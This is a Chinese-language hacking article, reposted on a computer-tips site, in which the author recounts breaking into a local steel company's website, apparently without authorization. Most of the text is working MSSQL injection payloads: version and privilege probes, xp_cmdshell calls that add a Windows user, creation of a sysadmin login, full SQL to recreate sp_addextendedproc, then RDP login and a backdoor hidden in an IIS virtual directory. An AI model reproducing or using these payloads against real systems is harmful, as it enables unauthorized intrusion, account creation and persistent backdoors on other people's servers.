| 下载中心 | 文章中心 | 虚拟主机 | 网站开发 | 加入收藏 | 设为首页  
   本站首页 | 公司资讯 | 业内资讯 | 服务器类 | 黑客相关 | 私服技术 | 家用电脑 | 网站建设 | 局域网类 | 网吧相关 | 游戏攻略 | 编程开发 | 软件应用 | 硬件维修 | 分类
 站内搜索:
  百度热门搜索: it教育 网络教育 网站推广 创业致富 电动车 太阳能 瘦身产品 公告: 联邦电脑十周年系列操作系统,快速稳定,欢迎下载使用!
  热门阅读
  相关文章
注射MSSQL时解决的一个未见过的问题
作者:佚名  来源:不详  发布时间:2007-5-3 11:13:02  发布人:snlb

减小字体 增大字体

type="14217"> 小泥巴haco QQ56902609   from: [火狐-天堂末班车] www.wrsky.com

今天没事做,对本地的一家钢铁企业的网站做了次安检,嘿嘿.漏洞一大把.当然 这是意料中的事.最近搞大家都喜欢搞脚本.那我也就从他们的网站程序看看了.
show.aspx?id=1'
嘿嘿  asp.net  照样暴  说什么有未闭合的分号.
show.aspx?id=1 and (select @@version)>0;--
果然,2003的系统
show.aspx?id=1 and 'sa'=(select System_user)--
嘿嘿 正确返回  有权限了  想到直接用xp_cmeshell直接添加帐号
因为之前已经知道这服务器开了3389的
所以 我们继续来:
show.aspx?id=1;exec master.dbo.xp_cmdshell "net user haco lovehaco /add"--
我倒,返回结果错误了  看来管理员还不是很可爱噢
那我们来恢复这个存储过程?OK  继续
show.aspx?id=1;exec master.dbo.sp_addextendedpro xp_cmdshell,@dllname='xplog70.dll'--
回车后……狂晕死.居然说什么过程sp_addextendedproc没找着  开始我以为是删除了xplog70.dll  可是后来不这样这样认为了  记得以前也碰到过这样的事  可是都没能解决  这次一定要搞定  嘿嘿!之后 到处问人
这里要感谢一下BST论坛里的tob88  谢谢  是他提醒了我
不就是过程SP_ADDextendedproc被删除了嘛 我们恢复它就是了嘛!
为了方便  我添加了个sysadmin的帐号
show.aspx?id=1;exec master.dbo.sp_addlogin haco,lovehaco;--
show.aspx?id=1;exec master.dbo.sp_addsrvrolemember haco,sysadmin;--   HOHO~  搞定   俺自己装了MSSQL  企业管理器里连上这台服务器的SQL
调出查询器  恢复过程sp_addextendedproc  如下:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
哈哈  试下  sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
哇!命令成功完成   耶!添加帐号 登陆3389 留个我最喜欢的绝对后门
IIS隐藏虚拟目录  搞定  闪人……

PS:其实像sp_addextendedproc这些过程也都可以删除掉 就不能添加了
当然 也可以恢复的  这个恢复的语句 是从MSSQL数据库里得到的  有兴趣的朋友可以自己试试看  呵呵   这是我小泥巴第一次写东西  很稀烂的 大家看看就算了  别笑噢  要不 我会5555哭的噢!
[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:剖析拒绝服务攻击-SYN拒绝服务
下一篇文章:如何在Linux下搭建Web应用环境
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站地图
  联邦电脑版权所有 Copyright©1996-2004 联邦电脑 All Rights Reserved  
   xkej@sina.com 业务联系:0516-88380202 88085202 QQ: 81566563  
  苏ICP备05045772号 当前在线人数: